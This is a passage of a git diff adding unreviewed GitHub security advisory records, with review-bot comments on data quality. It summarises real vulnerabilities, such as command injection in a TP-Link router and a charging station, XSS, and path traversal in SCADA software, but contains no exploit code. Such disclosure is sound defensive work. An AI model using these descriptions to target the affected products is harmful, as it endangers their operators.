+++ b/advisories/unreviewed/2024/02/GHSA-p23j-w6jc-gg7v/GHSA-p23j-w6jc-gg7v.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p23j-w6jc-gg7v",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0791"
+ ],
+ "details": "The WOLF – WordPress Posts Bulk Editor and Manager Professional plugin for WordPress is vulnerable to unauthorized access, modification or loss of data due to a missing capability check on the wpbe_create_new_term, wpbe_update_tax_term, and wpbe_delete_tax_term functions in all versions up to, and including, 1.0.8.1. This makes it possible for authenticated attackers, with subscriber access or higher, to create, delete or modify taxonomy terms.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0791"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/13c66a8f-b35f-4943-8880-0799b0d150f7?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:05Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p25h-32f2-ffm3/GHSA-p25h-32f2-ffm3.json b/advisories/unreviewed/2024/02/GHSA-p25h-32f2-ffm3/GHSA-p25h-32f2-ffm3.json
new file mode 100644
index 0000000000000..641a16f0d4517
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p25h-32f2-ffm3/GHSA-p25h-32f2-ffm3.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p25h-32f2-ffm3",
+ "modified": "2024-02-08T21:30:38Z",
+ "published": "2024-02-08T21:30:38Z",
+ "aliases": [
+ "CVE-2024-24115"
+ ],
+ "details": "A stored cross-site scripting (XSS) vulnerability in the Edit Page function of Cotonti CMS v0.9.24 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24115"
+ },
+ {
+ "type": "WEB",
+ "url": "https://mechaneus.github.io/CVE-PENDING-COTONTI.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T20:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p3gm-xxh4-xjmg/GHSA-p3gm-xxh4-xjmg.json b/advisories/unreviewed/2024/02/GHSA-p3gm-xxh4-xjmg/GHSA-p3gm-xxh4-xjmg.json
new file mode 100644
index 0000000000000..bab7f665d4388
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p3gm-xxh4-xjmg/GHSA-p3gm-xxh4-xjmg.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p3gm-xxh4-xjmg",
+ "modified": "2024-02-06T03:32:59Z",
+ "published": "2024-02-06T03:32:59Z",
+ "aliases": [
+ "CVE-2023-46359"
+ ],
+ "details": "An OS command injection vulnerability in Hardy Barth cPH2 eCharge Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46359"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/"
+ },
+ {
+ "type": "WEB",
+ "url": "http://hardy.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T01:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p3jh-mv97-74gv/GHSA-p3jh-mv97-74gv.json b/advisories/unreviewed/2024/02/GHSA-p3jh-mv97-74gv/GHSA-p3jh-mv97-74gv.json
new file mode 100644
index 0000000000000..cf9686c75fecc
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p3jh-mv97-74gv/GHSA-p3jh-mv97-74gv.json
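Review bot: The third reference, `"url": "http://hardy.com"`, is a bare plain-HTTP vendor root with no advisory or patch content behind it, so it gives a reader nothing the Offensity write-up does not, and a plain-HTTP link in a security advisory is the kind of reference that should at least be `https://` if it is kept. If the exporter mirrors NVD references verbatim this cannot be fixed here, but it is worth a filter for `WEB` references that are scheme-plus-host only. `"cwe_ids"` is also empty for what the description itself calls an OS command injection; populating it (CWE-78 is what the sibling TP-Link records at L2249 and L2269 use for the same class) would keep the CWE filter consistent across this batch.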
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p3jh-mv97-74gv",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2024-20814"
+ ],
+ "details": "Out-of-bounds Read in padmd_vld_ac_prog_refine of libpadm.so prior to SMR Feb-2024 Release 1 allows attacker access unauthorized information.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20814"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T03:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p3jw-3876-6r2f/GHSA-p3jw-3876-6r2f.json b/advisories/unreviewed/2024/02/GHSA-p3jw-3876-6r2f/GHSA-p3jw-3876-6r2f.json
new file mode 100644
index 0000000000000..4ed895443ae0c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p3jw-3876-6r2f/GHSA-p3jw-3876-6r2f.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p3jw-3876-6r2f",
+ "modified": "2024-02-08T15:30:27Z",
+ "published": "2024-02-08T15:30:27Z",
+ "aliases": [
+ "CVE-2023-7169"
+ ],
+ "details": "Authentication Bypass by Spoofing vulnerability in Snow Software Snow Inventory Agent on Windows allows Signature Spoof.This issue affects Snow Inventory Agent: through 6.14.5. Customers advised to upgrade to version 7.0\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7169"
+ },
+ {
+ "type": "WEB",
+ "url": "https://community.snowsoftware.com/s/feed/0D5Td000004YtMcKAK"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-290"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T13:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p434-7834-2w5x/GHSA-p434-7834-2w5x.json b/advisories/unreviewed/2024/02/GHSA-p434-7834-2w5x/GHSA-p434-7834-2w5x.json
new file mode 100644
index 0000000000000..fed6c40bd750f
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p434-7834-2w5x/GHSA-p434-7834-2w5x.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p434-7834-2w5x",
+ "modified": "2024-02-02T09:30:22Z",
+ "published": "2024-02-02T09:30:22Z",
+ "aliases": [
+ "CVE-2021-22281"
+ ],
+ "details": ": Relative Path Traversal vulnerability in B&R Industrial Automation Automation Studio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Automation Studio: from 4.0 through 4.12.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22281"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.br-automation.com/fileadmin/2021-11_ZipSlip_Vulnerability_in_Automation_Studio_Project_Import-b90d2f42.pdf"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-23"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T08:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p453-6h64-wr8m/GHSA-p453-6h64-wr8m.json b/advisories/unreviewed/2024/02/GHSA-p453-6h64-wr8m/GHSA-p453-6h64-wr8m.json
new file mode 100644
index 0000000000000..1a4625594b826
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p453-6h64-wr8m/GHSA-p453-6h64-wr8m.json
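Review bot: The `"details"` string begins with a stray `": "` (`": Relative Path Traversal vulnerability in …"`) and ends with two literal `\n\n`, so any UI that renders the description verbatim shows a leading colon and trailing blank lines; trimming leading punctuation and trailing whitespace on import would give `"details": "Relative Path Traversal vulnerability in B&R Industrial Automation Automation Studio allows …"`. The trailing `\n` padding recurs in the records added at L2259, L2261, L2262, L2265, L2266, L2270 and L2271, so a single `strip()`-style normalisation in the exporter would cover all of them. If the text is mirrored from NVD unchanged by design, the fix belongs upstream and this is only a note.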
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p453-6h64-wr8m",
+ "modified": "2024-02-05T09:30:28Z",
+ "published": "2024-02-05T09:30:28Z",
+ "aliases": [
+ "CVE-2024-24857"
+ ],
+ "details": "A race condition was found in the Linux kernel's net/bluetooth device driver in conn_info_{min,max}_age_set() function. This can result in integrity overflow issue, possibly leading to bluetooth connection abnormality or denial of service.\n\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24857"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8155"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-362"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T08:15:44Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p469-qwjm-crp9/GHSA-p469-qwjm-crp9.json b/advisories/unreviewed/2024/02/GHSA-p469-qwjm-crp9/GHSA-p469-qwjm-crp9.json
new file mode 100644
index 0000000000000..72533d0612813
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p469-qwjm-crp9/GHSA-p469-qwjm-crp9.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p469-qwjm-crp9",
+ "modified": "2024-02-02T18:30:31Z",
+ "published": "2024-02-02T18:30:31Z",
+ "aliases": [
+ "CVE-2023-41275"
+ ],
+ "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41275"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-23-38"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-120"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p469-vfhm-jcf8/GHSA-p469-vfhm-jcf8.json b/advisories/unreviewed/2024/02/GHSA-p469-vfhm-jcf8/GHSA-p469-vfhm-jcf8.json
new file mode 100644
index 0000000000000..3a7fd9d6fac07
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p469-vfhm-jcf8/GHSA-p469-vfhm-jcf8.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p469-vfhm-jcf8",
+ "modified": "2024-02-02T06:30:32Z",
+ "published": "2024-02-02T06:30:32Z",
+ "aliases": [
+ "CVE-2024-1162"
+ ],
+ "details": "The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.10.29. This is due to missing or incorrect nonce validation on the register_reference() function. This makes it possible for unauthenticated attackers to update the connected API keys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1162"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030173%40themeisle-companion&new=3030173%40themeisle-companion&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/88f6a24f-f14a-4d0a-be5a-f8c84910b4fc?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T06:15:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p4jh-rvp5-j37g/GHSA-p4jh-rvp5-j37g.json b/advisories/unreviewed/2024/02/GHSA-p4jh-rvp5-j37g/GHSA-p4jh-rvp5-j37g.json
new file mode 100644
index 0000000000000..fd23686c9b4f9
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p4jh-rvp5-j37g/GHSA-p4jh-rvp5-j37g.json
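Review bot: The plugins.trac.wordpress.org changeset reference carries the same revision on both sides, `old=3030173%40themeisle-companion&new=3030173%40themeisle-companion`, so the link renders an empty diff and does not actually point a reader at the nonce fix the description refers to. The sibling changeset references in this batch (L2255, L2272) do have distinct `old`/`new` revisions, which suggests this one is a copy error in the upstream reference rather than the exporter's doing. I cannot tell from the page which revision the fix landed in, so the reference should be checked against the Wordfence entry that is also listed and corrected there, or dropped if no distinct revision can be established.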
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p4jh-rvp5-j37g",
+ "modified": "2024-02-06T06:30:31Z",
+ "published": "2024-02-06T06:30:31Z",
+ "aliases": [
+ "CVE-2023-33057"
+ ],
+ "details": "Transient DOS in Multi-Mode Call Processor while processing UE policy container.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33057"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p4rq-vwgg-386f/GHSA-p4rq-vwgg-386f.json b/advisories/unreviewed/2024/02/GHSA-p4rq-vwgg-386f/GHSA-p4rq-vwgg-386f.json
new file mode 100644
index 0000000000000..cc21262589f70
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p4rq-vwgg-386f/GHSA-p4rq-vwgg-386f.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p4rq-vwgg-386f",
+ "modified": "2024-02-08T15:30:26Z",
+ "published": "2024-02-08T12:30:48Z",
+ "aliases": [
+ "CVE-2023-6519"
+ ],
+ "details": "Exposure of Data Element to Wrong Session vulnerability in Mia Technology Inc. MİA-MED allows Read Sensitive Strings Within an Executable.This issue affects MİA-MED: before 1.0.7.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6519"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usom.gov.tr/bildirim/tr-24-0087"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-488"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T12:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p52j-m9w6-3m42/GHSA-p52j-m9w6-3m42.json b/advisories/unreviewed/2024/02/GHSA-p52j-m9w6-3m42/GHSA-p52j-m9w6-3m42.json
new file mode 100644
index 0000000000000..fb62a0b367432
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p52j-m9w6-3m42/GHSA-p52j-m9w6-3m42.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p52j-m9w6-3m42",
+ "modified": "2024-02-06T21:30:25Z",
+ "published": "2024-02-01T12:30:21Z",
+ "aliases": [
+ "CVE-2023-52175"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Michael Uno (miunosoft) Auto Amazon Links – Amazon Associates Affiliate Plugin allows Stored XSS.This issue affects Auto Amazon Links – Amazon Associates Affiliate Plugin: from n/a through 5.1.1.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52175"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/amazon-auto-links/wordpress-auto-amazon-links-amazon-associates-affiliate-plugin-5-0-5-auth-stored-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T10:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p56v-8px4-hjvv/GHSA-p56v-8px4-hjvv.json b/advisories/unreviewed/2024/02/GHSA-p56v-8px4-hjvv/GHSA-p56v-8px4-hjvv.json
new file mode 100644
index 0000000000000..e60438cb682a6
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p56v-8px4-hjvv/GHSA-p56v-8px4-hjvv.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p56v-8px4-hjvv",
+ "modified": "2024-02-02T03:30:32Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2023-46159"
+ ],
+ "details": "IBM Storage Ceph 5.3z1, 5.3z5, and 6.1z1 could allow an authenticated user on the network to cause a denial of service from RGW. IBM X-Force ID: 268906.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46159"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/268906"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7112263"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-20"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T03:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p6wv-4394-73p5/GHSA-p6wv-4394-73p5.json b/advisories/unreviewed/2024/02/GHSA-p6wv-4394-73p5/GHSA-p6wv-4394-73p5.json
new file mode 100644
index 0000000000000..6a792c1e96cb3
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p6wv-4394-73p5/GHSA-p6wv-4394-73p5.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p6wv-4394-73p5",
+ "modified": "2024-02-07T06:35:21Z",
+ "published": "2024-02-07T06:35:21Z",
+ "aliases": [
+ "CVE-2024-23447"
+ ],
+ "details": "An issue was discovered in the Windows Network Drive Connector when using Document Level Security to assign permissions to a file, with explicit allow write and deny read. Although the document is not accessible to the user in Network Drive it is visible in search applications to the user.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23447"
+ },
+ {
+ "type": "WEB",
+ "url": "https://discuss.elastic.co/t/elastic-network-drive-connector-8-12-1-security-update-esa-2024-02/352687"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.elastic.co/community/security"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-284"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T04:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p72g-62xm-rq24/GHSA-p72g-62xm-rq24.json b/advisories/unreviewed/2024/02/GHSA-p72g-62xm-rq24/GHSA-p72g-62xm-rq24.json
new file mode 100644
index 0000000000000..b075cb6a4d8e9
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p72g-62xm-rq24/GHSA-p72g-62xm-rq24.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p72g-62xm-rq24",
+ "modified": "2024-02-06T18:30:21Z",
+ "published": "2024-02-06T18:30:21Z",
+ "aliases": [
+ "CVE-2023-47167"
+ ],
+ "details": "A post authentication command injection vulnerability exists in the GRE policy functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47167"
+ },
+ {
+ "type": "WEB",
+ "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1855"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T17:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p7q4-p756-4hjh/GHSA-p7q4-p756-4hjh.json b/advisories/unreviewed/2024/02/GHSA-p7q4-p756-4hjh/GHSA-p7q4-p756-4hjh.json
new file mode 100644
index 0000000000000..882afb82bb3e4
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p7q4-p756-4hjh/GHSA-p7q4-p756-4hjh.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p7q4-p756-4hjh",
+ "modified": "2024-02-08T15:30:27Z",
+ "published": "2024-02-08T12:30:49Z",
+ "aliases": [
+ "CVE-2024-24885"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Lê Văn Toản Woocommerce Vietnam Checkout allows Stored XSS.This issue affects Woocommerce Vietnam Checkout: from n/a through 2.0.7.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24885"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/woo-vietnam-checkout/wordpress-woocommerce-vietnam-checkout-plugin-2-0-7-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T12:15:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p873-hg5h-j2mp/GHSA-p873-hg5h-j2mp.json b/advisories/unreviewed/2024/02/GHSA-p873-hg5h-j2mp/GHSA-p873-hg5h-j2mp.json
new file mode 100644
index 0000000000000..23eb8a2020de9
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p873-hg5h-j2mp/GHSA-p873-hg5h-j2mp.json
@@ -0,0 +1,43 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p873-hg5h-j2mp",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-02T00:31:28Z",
+ "aliases": [
+ "CVE-2024-22096"
+ ],
+ "details": "In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an attacker can append path traversal characters to the filename when using a specific command, allowing them to read arbitrary files from the system.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22096"
+ },
+ {
+ "type": "WEB",
+ "url": "https://rapidscada.org/contact/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22",
+ "CWE-23"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T00:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p884-m725-55w6/GHSA-p884-m725-55w6.json b/advisories/unreviewed/2024/02/GHSA-p884-m725-55w6/GHSA-p884-m725-55w6.json
new file mode 100644
index 0000000000000..295abb53dc1c0
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p884-m725-55w6/GHSA-p884-m725-55w6.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p884-m725-55w6",
+ "modified": "2024-02-06T00:30:25Z",
+ "published": "2024-02-06T00:30:25Z",
+ "aliases": [
+ "CVE-2023-6557"
+ ],
